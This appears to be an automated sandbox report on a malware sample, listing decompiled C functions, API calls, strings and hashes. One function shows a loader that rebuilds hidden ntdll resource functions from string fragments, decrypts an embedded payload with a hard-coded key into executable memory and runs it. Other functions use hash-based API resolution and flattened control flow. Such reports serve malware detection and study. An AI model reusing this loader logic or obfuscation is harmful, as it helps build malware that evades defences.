				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int** _t157;
				void* _t159;
				void* _t160;

				_t157 =  &_v140;
				_t104 = _v120;
				_t155 = _v120;
				_v132 = __edx;
				_t150 = 0x3b18423d;
				_v136 = __ecx;
				_v128 = 0;
				while(1) {
					L1:
					_t61 = _v140;
					do {
						while(1) {
							L2:
							_t159 = _t150 - 0x1c8b703e;
							if(_t159 > 0) {
								break;
							}
							if(_t159 == 0) {
								_t106 =  *0x22cdef8;
								__eflags = _t106;
								if(_t106 == 0) {
									_t106 = E022C3E80(_t104, E022C3F20(0x667fdee), 0xb11f83b0, _t155);
									 *0x22cdef8 = _t106;
								}
								_t63 =  *0x22ce2e4; // 0x7792e8
								 *_t106( *((intOrPtr*)(_t63 + 0x18)), 0, 0,  &_v124);
								asm("sbb esi, esi");
								_t150 = (_t150 & 0x258fd75b) + 0x8cf6762;
								while(1) {
									L1:
									_t61 = _v140;
									goto L2;
								}
							} else {
								_t160 = _t150 - 0x13859baf;
								if(_t160 > 0) {
									__eflags = _t150 - 0x14926a00;
									if(_t150 != 0x14926a00) {
										goto L8;
									} else {
										_t69 =  *0x22ce168;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E022C3E80(_t104, E022C3F20(0x667fdee), 0xae646c41, _t155);
											 *0x22ce168 = _t69;
										}
										 *_t69(_v124);
										_t150 = 0x8cf6762;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									if(_t160 == 0) {
										_t111 =  *0x22cde98;
										__eflags = _t111;
										if(_t111 == 0) {
											_t111 = E022C3E80(_t104, E022C3F20(0x667fdee), 0xe5edfdec, _t155);
											_t61 = _v140;
											 *0x22cde98 = _t111;
										}
										_t72 =  *0x22ce2e4; // 0x7792e8
										 *_t111( *((intOrPtr*)(_t72 + 0x20)), _v124, 1, 0, _t61,  &_v120, _t155);
										_t112 = _v164;
										_t139 = _v160;
										asm("sbb esi, esi");
										_t150 = (_t150 & 0x0b40c3ab) + 0x14926a00;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									} else {
										if(_t150 == 0x3028e43) {
											_t113 =  *0x22ce060;
											_v112 = 0x14;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = E022C3E80(_t104, E022C3F20(0x667fdee), 0xe39c7ccc, _t155);
												 *0x22ce060 = _t113;
											}
											_t79 =  *_t113(_v124, 2, _t104 + 0x60,  &_v112, 0);
											_t112 = _v156;
											__eflags = _t79;
											_t61 = _v160;
											_t139 = _v152;
											if(_t79 != 0) {
												_t150 = 0x14926a00;
												_v148 = 1;
												while(1) {
													L1:
													_t61 = _v140;
													goto L2;
												}
											}
											continue;
										} else {
											if(_t150 == 0x8cf6762) {
												_t147 = _v128;
												__eflags = _t147;
												if(_t147 == 0) {
													E022C4250(_t104,  *_t139);
												}
												return _t147;
											} else {
												goto L8;
											}
										}
									}
								}
							}
							L51:
						}
						__eflags = _t150 - 0x2f4b92a8;
						if(__eflags > 0) {
							__eflags = _t150 - 0x3b18423d;
							if(_t150 != 0x3b18423d) {
								goto L8;
							} else {
								_t150 = 0x2f4b92a8;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								_t85 = _t112[1] + 1;
								__eflags = _t85 & 0x0000000f;
								if((_t85 & 0x0000000f) != 0) {
									_t85 = (_t85 & 0xfffffff0) + 0x10;
									__eflags = _t85;
								}
								_t151 = _t85 + 0x74;
								_t86 =  *0x22cdea8;
								_t139[1] = _t151;
								__eflags = _t86;
								if(_t86 == 0) {
									_t86 = E022C3E80(_t104, E022C3F20(0xbb398380), 0x97f883e, _t155);
									 *0x22cdea8 = _t86;
								}
								_t148 =  *_t86();
								_t88 =  *0x22cdcec;
								__eflags = _t88;
								if(_t88 == 0) {
									_t88 = E022C3E80(_t104, E022C3F20(0xbb398380), 0xe9233692, _t155);
									 *0x22cdcec = _t88;
								}
								_t89 =  *_t88(_t148, 8, _t151);
								_t139 = _v144;
								_t104 = _t89;
								 *_t139 = _t104;
								__eflags = _t104;
								if(_t104 == 0) {
									break;
								} else {
									_t53 = _t104 + 0x74; // 0x74
									_t61 = _t53;
									_t150 = 0x1c8b703e;
									_v152 = _t61;
									_t155 =  &_v116;
									_v132 = _v148[1];
									_t112 = _v148;
									goto L2;
								}
							} else {
								__eflags = _t150 - 0x1fd32dab;
								if(_t150 == 0x1fd32dab) {
									_t117 =  *0x22ce0f8;
									_v116 = 0x6c;
									__eflags = _t117;
									if(_t117 == 0) {
										_t117 = E022C3E80(_t104, E022C3F20(0x667fdee), 0xd10d6746, _t155);
										 *0x22ce0f8 = _t117;
									}
									_t92 =  *0x22ce2e4; // 0x7792e8
									_t93 =  *_t117( *((intOrPtr*)(_t92 + 0x20)),  *((intOrPtr*)(_t92 + 0x1c)), 1, 0x40,  &_v108,  &_v116); // executed
									__eflags = _t93;
									if(_t93 == 0) {
										_t112 = _v160;
										_t150 = 0x14926a00;
										_t139 = _v156;
										goto L1;
									} else {
										_t120 =  &_v25;
										_t142 = _t104;
										do {
											_t142 = _t142 + 1;
											 *((char*)(_t142 - 1)) =  *_t120;
											_t120 = _t120 - 1;
											__eflags = _t120 -  &_v120;
										} while (_t120 >=  &_v120);
										_t112 = _v160;
										_t150 = 0x3028e43;
										_t139 = _v156;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									__eflags = _t150 - 0x2e5f3ebd;
									if(_t150 != 0x2e5f3ebd) {
										goto L8;
									} else {
										_t98 =  *0x22cdaac;
										_t152 = _t112[1];
										_t149 =  *_t112;
										__eflags = _t98;
										if(_t98 == 0) {
											_t98 = E022C3E80(_t104, E022C3F20(0xe66945e6), 0x70f7b8ec, _t155);
											 *0x22cdaac = _t98;
										}
										 *_t98(_v140, _t149, _t152);
										_t112 = _v136;
										_t157 =  &(_t157[3]);
										_t139 = _v132;
										_t150 = 0x13859baf;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								}
							}
						}
						goto L51;
						L8:
					} while (_t150 != 0xd360827);
					return _v128;
					goto L51;
				}
			}

0x022c2290
0x022c2297
0x022c229e
0x022c22a4
0x022c22a8
0x022c22ad
0x022c22b1
0x022c22b5
0x022c22b5
0x022c22b5
0x022c22c0
0x022c22c0
0x022c22c0
0x022c22c0
0x022c22c6
0x00000000
0x00000000
0x022c22cc
0x022c2422
0x022c2428
0x022c242a
0x022c2442
0x022c2444
0x022c2444
0x022c244f
0x022c245b
0x022c2467
0x022c246f
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22d2
0x022c22d2
0x022c22d8
0x022c23da
0x022c23e0
0x00000000
0x022c23e6
0x022c23e6
0x022c23eb
0x022c23ed
0x022c2400
0x022c2405
0x022c2405
0x022c240e
0x022c2414
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22b5
0x022c22de
0x022c22de
0x022c2378
0x022c237e
0x022c2380
0x022c2398
0x022c239a
0x022c239e
0x022c239e
0x022c23ab
0x022c23bb
0x022c23bd
0x022c23c3
0x022c23c7
0x022c23cf
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22e4
0x022c22ea
0x022c230f
0x022c2315
0x022c231d
0x022c231f
0x022c2337
0x022c2339
0x022c2339
0x022c2350
0x022c2352
0x022c2356
0x022c2358
0x022c235c
0x022c2360
0x022c2366
0x022c236b
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22b5
0x00000000
0x022c22ec
0x022c22f2
0x022c2627
0x022c262b
0x022c262d
0x022c2631
0x022c2631
0x022c2642
0x00000000
0x00000000
0x00000000
0x022c22f2
0x022c22ea
0x022c22de
0x022c22d8
0x00000000
0x022c22cc
0x022c247a
0x022c2480
0x022c2611
0x022c2617
0x00000000
0x022c261d
0x022c261d
0x00000000
0x022c261d
0x022c2486
0x022c2486
0x022c2578
0x022c2579
0x022c257b
0x022c2580
0x022c2580
0x022c2580
0x022c2583
0x022c2586
0x022c258b
0x022c258e
0x022c2590
0x022c25a3
0x022c25a8
0x022c25a8
0x022c25af
0x022c25b1
0x022c25b6
0x022c25b8
0x022c25cb
0x022c25d0
0x022c25d0
0x022c25d9
0x022c25db
0x022c25df
0x022c25e1
0x022c25e3
0x022c25e5
0x00000000
0x022c25eb
0x022c25ef
0x022c25ef
0x022c25f5
0x022c25fa
0x022c25fe
0x022c2604
0x022c2608
0x00000000
0x022c2608
0x022c248c
0x022c248c
0x022c2492
0x022c24e6
0x022c24ec
0x022c24f4
0x022c24f6
0x022c250e
0x022c2510
0x022c2510
0x022c2520
0x022c252f
0x022c2531
0x022c2533
0x022c2563
0x022c2567
0x022c256c
0x00000000
0x022c2535
0x022c2535
0x022c253c
0x022c2540
0x022c2542
0x022c2545
0x022c2548
0x022c254d
0x022c254d
0x022c2551
0x022c2555
0x022c255a
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22b5
0x022c2494
0x022c2494
0x022c249a
0x00000000
0x022c24a0
0x022c24a0
0x022c24a5
0x022c24a8
0x022c24aa
0x022c24ac
0x022c24bf
0x022c24c4
0x022c24c4
0x022c24cf
0x022c24d1
0x022c24d5
0x022c24d8
0x022c24dc
0x022c22b5
0x022c22b5
0x022c22b5
0x00000000
0x022c22b5
0x022c22b5
0x022c249a
0x022c2492
0x022c2486
0x00000000
0x022c22f8
0x022c22f8
0x022c230e
0x00000000
0x022c230e

Strings

l, xrefs: 022C24EC
Ei, xrefs: 022C24AE

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID:
String ID: l$Ei
API String ID: 0-2145112675
Opcode ID: d1f6369701d6eaf3b61d0ea320c3f1009116cfca46555b73554826a83f98b3ac
Instruction ID: a37ad8dee537414a59bc16b01294aed430a256d29ff3a874e07762ff41eedbcb
Opcode Fuzzy Hash: d1f6369701d6eaf3b61d0ea320c3f1009116cfca46555b73554826a83f98b3ac
Instruction Fuzzy Hash: CD91C271A14302DBDB18DEA4D494B6BB7E2AB88300F254B6DE8599B358DF70DC058BD3

Uniqueness

Uniqueness Score: -1.00%

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409C36() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
				 *0x439edc = _t1;
				return _t1;
			}

0x00409c3b
0x00409c41
0x00409c46

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C

Uniqueness

Uniqueness Score: -1.00%

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004013A4(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr _v44;
				CHAR* _v52;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				intOrPtr _v128;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				void* _v156;
				long _v160;
				char _v176;
				void* _v180;
				intOrPtr _v184;
				char _v200;
				char _v216;
				intOrPtr _v228;
				char _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				void* _v256;
				struct HINSTANCE__* _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v316;
				void* _v320;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				void* _t188;
				void* _t189;
				intOrPtr _t244;

				_push(0xffffffff);
				_push(E00429B1F);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t244;
				_v448 = __ecx;
				_v256 = 0;
				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
					_v152 = 0x1e55;
					_v240 = 0x1155;
					_v44 = 0x409;
					_v72 = 0;
					_v160 = 0;
					_v252 = 0xa;
					_v248 = _v152;
					_v244 = _v44;
					_v260 = 0;
					_v176 = _v264;
					E00401AE0( &_v176, 0);
					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
					_v8 = 0;
					_v216 = _v268;
					E00401AE0( &_v216, 0);
					E00401B90( &_v216, "dReso", E00405A40("dReso"));
					_v8 = 1;
					_v36 = _v272;
					E00401AE0( &_v36, 0);
					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
					_v8 = 2;
					_v452 = E00402030( &_v288,  &_v176,  &_v216);
					_v456 = _v452;
					_v8 = 3;
					E00402030( &_v232, _v456,  &_v36);
					_v8 = 5;
					E00401AE0( &_v288, 1);
					_v200 = _v292;
					E00401AE0( &_v200, 0);
					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
					_v8 = 6;
					_v144 = _v296;
					E00401AE0( &_v144, 0);
					E00401B90( &_v144, "Acces", E00405A40("Acces"));
					_v8 = 7;
					_v88 = _v300;
					E00401AE0( &_v88, 0);
					E00401B90( &_v88, "sResource", E00405A40("sResource"));
					_v8 = 8;
					_v460 = E00402030( &_v316,  &_v200,  &_v144);
					_v464 = _v460;
					_v8 = 9;
					E00402030( &_v68, _v464,  &_v88);
					_v8 = 0xb;
					E00401AE0( &_v316, 1);
					_v52 = "ntdll.dll";
					if(_v228 != 0) {
						_v468 = _v228;
					} else {
						_v468 = 0x42b704;
					}
					_v184 = _v468;
					if(_v64 != 0) {
						_v472 = _v64;
					} else {
						_v472 = 0x42b704;
					}
					_v128 = _v472;
					_v260 = LoadLibraryA(_v52);
					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
					if(_v236 >= 0) {
						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
					}
					_v180 = 0;
					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
						_v180 = _t189;
					}
					E00405700(_v180, _v72, _v160);
					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
					E00401163(_v180, _v160,  &_v20);
					_v156 = _v180;
					_v148 = _v156();
					_v320 = 0;
					_v8 = 8;
					E00401AE0( &_v68, 1);
					_v8 = 7;
					E00401AE0( &_v88, 1);
					_v8 = 6;
					E00401AE0( &_v144, 1);
					_v8 = 5;
					E00401AE0( &_v200, 1);
					_v8 = 2;
					E00401AE0( &_v232, 1);
					_v8 = 1;
					E00401AE0( &_v36, 1);
					_v8 = 0;
					E00401AE0( &_v216, 1);
					_v8 = 0xffffffff;
					E00401AE0( &_v176, 1);
					_t188 = _v320;
				} else {
					_t188 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t188;
			}

APIs

LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
GetProcAddress.KERNEL32(00000000), ref: 004013E3
CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6

Strings

C:\ProgramData\, xrefs: 00401751
@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@, xrefs: 0040179C
LdrFindResource_U, xrefs: 004016D0
Ldr, xrefs: 0040157E, 0040158C
sResource, xrefs: 004015EE, 004015FC
kernel32.dll, xrefs: 004013D7
LdrAccessResource, xrefs: 004016E7
Acces, xrefs: 004015B9, 004015C7
urce_U, xrefs: 004014E8, 004014F6
dReso, xrefs: 004014B3, 004014C1
C:\Windows\Microsoft.NET, xrefs: 004013F1
CreateDirectoryA, xrefs: 004013D2
LdrFin, xrefs: 00401475, 00401483

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressCreateDirectoryLibraryLoadProc
String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
API String ID: 3952968459-2121162702
Opcode ID: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction ID: 061a306ec623a826179d85857fa582b4a8c01ab5e49a60f3ccf10d5f337b011f
Opcode Fuzzy Hash: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction Fuzzy Hash: BDD14070E41258ABDB20DB90DD56BEEB7B4AB18304F1081EAE509772D1DBB81F84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0042592B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042592B() {
				void* __ecx;
				void* __ebp;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x4399c8
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x760150
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x760150
							GlobalLock(GlobalHandle( *_t15));
							_t16 = _t74 + 0x14; // 0x406468
							LeaveCriticalSection( *_t16);
							E0041007F(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x760150
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x760150
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x760150
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

APIs

EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
GlobalHandle.KERNEL32(00760150), ref: 00425998
GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
GlobalReAlloc.KERNEL32 ref: 004259B3
GlobalHandle.KERNEL32(00760150), ref: 004259CA
GlobalLock.KERNEL32 ref: 004259D1
LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
GlobalLock.KERNEL32 ref: 004259E6
LeaveCriticalSection.KERNEL32(?), ref: 00425A2F

Strings

hd@, xrefs: 004259D3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID: hd@
API String ID: 2667261700-3469257913
Opcode ID: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction ID: 9ab521ae17bdcbf38e6808dd3f3d9ead1f2f8e9119152a2daa84f5c479dd3fff
Opcode Fuzzy Hash: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction Fuzzy Hash: C83181B1304709DFD7249F28EC89A2BB7E8FB44314B404A6EE892D3661D775F845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 022C1950, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 230
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E022C1950(intOrPtr* __ecx, void* __edx, void** _a4) {
				char _v68;
				char _v72;
				intOrPtr* _v132;
				char _v136;
				void* _v140;
				char _v144;
				intOrPtr _v148;
				intOrPtr* _v152;
				void* __ebx;
				void* __ebp;
				void* _t33;
				intOrPtr* _t34;
				signed int _t35;
				intOrPtr* _t38;
				signed int _t39;
				void* _t42;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t59;
				intOrPtr* _t64;
				void* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr* _t75;
				void** _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t83;
				intOrPtr* _t89;
				void* _t125;
				long _t126;
				void* _t131;
				void* _t132;
				void* _t133;
				intOrPtr _t134;
				void* _t135;
				void** _t138;
				void** _t139;
				void** _t140;
				void* _t142;

				_t83 = __ecx;
				_t138 =  &_v140;
				_v140 = __edx;
				_t33 = 0x28f1768;
				_t135 = _v140;
				_t125 = _v140;
				_v132 = __ecx;
				while(1) {
					L1:
					_t80 = _a4;
					do {
						while(1) {
							L2:
							_t142 = _t33 - 0xf6dd6c0;
							if(_t142 > 0) {
								break;
							}
							if(_t142 == 0) {
								_t80[1] =  *((intOrPtr*)(_t83 + 4)) + 0x1000;
								_t33 = 0x5a08c3;
								continue;
							} else {
								if(_t33 == 0x5a08c3) {
									_t64 =  *0x22cdea8;
									_t126 = _t80[1];
									if(_t64 == 0) {
										_t64 = E022C3E80(_t80, E022C3F20(0xbb398380), 0x97f883e, _t135);
										 *0x22cdea8 = _t64;
									}
									_t132 =  *_t64();
									if( *0x22cdcec == 0) {
										 *0x22cdcec = E022C3E80(_t80, E022C3F20(0xbb398380), 0xe9233692, _t135);
									}
									_t67 = RtlAllocateHeap(_t132, 8, _t126); // executed
									_t125 = _t67;
									 *_t80 = _t125;
									if(_t125 == 0) {
										goto L8;
									} else {
										_t33 = 0x11ecd0fb;
										_t83 = _v140;
										_t135 = _t125 + _t80[1];
										continue;
									}
								} else {
									if(_t33 == 0x28f1768) {
										_t71 =  *0x22cdd4c;
										if(_t71 == 0) {
											_t71 = E022C3E80(_t80, E022C3F20(0xbb398380), 0xae3c1a47, _t135);
											 *0x22cdd4c = _t71;
										}
										_t72 =  *_t71();
										_t83 = _v132;
										_v136 = _t72;
										_t33 = 0xf6dd6c0;
										continue;
									} else {
										if(_t33 == 0x3c584d9) {
											_t133 = E022C35C0(0x22cd0b0);
											_t75 =  *0x22cdf98;
											if(_t75 == 0) {
												_t75 = E022C3E80(_t80, E022C3F20(0xe66945e6), 0x91c072c8, _t135);
												 *0x22cdf98 = _t75;
											}
											 *_t75(_t125, _t135 - _t125, _t133, _v140);
											E022C3460(_t133);
											return 1;
										} else {
											goto L7;
										}
									}
								}
							}
							L38:
						}
						if(_t33 == 0x11ecd0fb) {
							_t34 =  *0x22cdf48;
							if(_t34 == 0) {
								_t34 = E022C3E80(_t80, E022C3F20(0xe66945e6), 0x5790059b, _t135);
								 *0x22cdf48 = _t34;
							}
							_t35 =  *_t34( &_v136);
							_t19 = (_t35 & 0x0000000f) + 4; // 0x4
							E022C4E60( &_v68, _t19,  &_v140);
							_t38 =  *0x22cdf48;
							_t139 =  &(_t138[1]);
							 *((char*)(_t139 + (_t35 & 0x0000000f) + 0x60)) = 0;
							if(_t38 == 0) {
								_t38 = E022C3E80(_t80, E022C3F20(0xe66945e6), 0x5790059b, _t135);
								 *0x22cdf48 = _t38;
							}
							_t39 =  *_t38( &_v140);
							_t25 = (_t39 & 0x0000000f) + 4; // 0x4
							E022C4E60( &_v136, _t25,  &_v144);
							_t140 =  &(_t139[1]);
							 *((char*)(_t140 + (_t39 & 0x0000000f) + 0x20)) = 0;
							_t42 = E022C35C0(0x22cd000);
							_t89 =  *0x22cdf98;
							_t81 = _t42;
							if(_t89 == 0) {
								_t89 = E022C3E80(_t81, E022C3F20(0xe66945e6), 0x91c072c8, _t135);
								 *0x22cdf98 = _t89;
							}
							_t125 = _t125 +  *_t89(_t125, _t135 - _t125, _t81, _v148,  &_v72,  &_v136);
							_t138 =  &(_t140[6]);
							_t48 =  *0x22cdea8;
							if(_t48 == 0) {
								_t48 = E022C3E80(_t81, E022C3F20(0xbb398380), 0x97f883e, _t135);
								 *0x22cdea8 = _t48;
							}
							_t131 =  *_t48();
							_t50 =  *0x22ce1a0;
							if(_t50 == 0) {
								_t50 = E022C3E80(_t81, E022C3F20(0xbb398380), 0x26c3f343, _t135);
								 *0x22ce1a0 = _t50;
							}
							 *_t50(_t131, 0, _t81);
							_t83 = _v152;
							_t33 = 0x16cf0daa;
							goto L1;
						} else {
							if(_t33 != 0x16cf0daa) {
								goto L7;
							} else {
								_t59 =  *0x22cdaac;
								_t134 =  *((intOrPtr*)(_t83 + 4));
								_t82 =  *_t83;
								if(_t59 == 0) {
									_t59 = E022C3E80(_t82, E022C3F20(0xe66945e6), 0x70f7b8ec, _t135);
									 *0x22cdaac = _t59;
								}
								 *_t59(_t125, _t82, _t134);
								_t83 = _v132;
								_t138 =  &(_t138[3]);
								_t33 = 0x3c584d9;
								_t125 = _t125 +  *((intOrPtr*)(_t83 + 4));
								while(1) {
									L1:
									_t80 = _a4;
									goto L2;
								}
							}
						}
						goto L38;
						L7:
					} while (_t33 != 0x1b4ffcf8);
					L8:
					return 0;
					goto L38;
				}
			}

0x022c1950
0x022c1950
0x022c1959
0x022c195d
0x022c1962
0x022c1967
0x022c196b
0x022c196f
0x022c196f
